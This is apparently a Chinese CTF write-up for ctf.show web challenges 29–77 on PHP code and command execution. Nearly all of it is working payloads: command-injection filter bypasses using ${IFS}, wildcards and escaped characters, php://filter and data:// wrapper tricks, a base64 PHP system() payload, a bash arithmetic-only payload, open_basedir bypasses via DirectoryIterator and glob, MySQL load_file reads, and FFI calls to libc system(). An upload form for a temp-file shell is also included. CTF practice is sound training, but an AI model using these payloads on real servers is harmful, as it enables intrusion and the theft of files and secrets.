[huayang]

web29

?c=echo `nl flag.php`

web30

?c=echo `nl fl\ag.p\hp`

web31

?C=highlight_file($_GET[1])?>&1=flag.php

web32

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web33

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web34

同上

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web35

同上

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web36

同上

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web37

/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web38

同上

/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web39

?c=data:text/plain,<?php system('cat fla?.php')?>

web40

?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

web41

https://blog.csdn.net/miuzzx/article/details/108569080

web42

?c=cat flag.php;

必须要 ；

web43

web44

?c=nl fla\g.php||

web45

?c=nl<fl\ag.php||

web46

?c=nl<fl\ag.php||

web47

?c=nl<fl\ag.php||

web48

?c=nl<fl\ag.php||

web49

?c=nl<fl\ag.php||

web50

?c=nl<fl\ag.php||

web51

?c=nl<fl\ag.php||

web52

?c=nl${IFS}/fla\g||

web53

?c=nl${IFS}fla\g.php&

web54

?c=grep${IFS}'fla'${IFS}fla?.php

web55

先写一个post上传的数据包

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://09bc84d8-cb8a-43a0-8ca0-8b0df54b56e9.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名：</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

上传并抓包

payload ：
?c=.+/???/????????[@-[]
!/bin/sh
ls
!/bin/sh
cat flag.php

方法二

payload:?c=/???/????64%20/????.???

不能用火狐

web56

同上

禁用了数字所以方法二不能用

web57

payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))))))

web58——web65

post:
c=show_source('flag.php')

web66——web70

post:
c=print_r(scandir("/"));

post:
c=highlight_file('flag.txt');

这里用show_source()会报错

web71

c=$a=new DirectoryIterator("glob:///*"); foreach($a as $f){ echo $f."    " ; } exit();

post:
c=include('/flag.txt');exit(0);

web72

略

web73-74

payload 查文件
c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' '); }exit(0); ?>

c=include('/flagc.txt');exit(0);

web75-76

c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

web77

c=$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();

再访问1.txt

[/huayang]

FROM：浅浅淡淡[hellohy]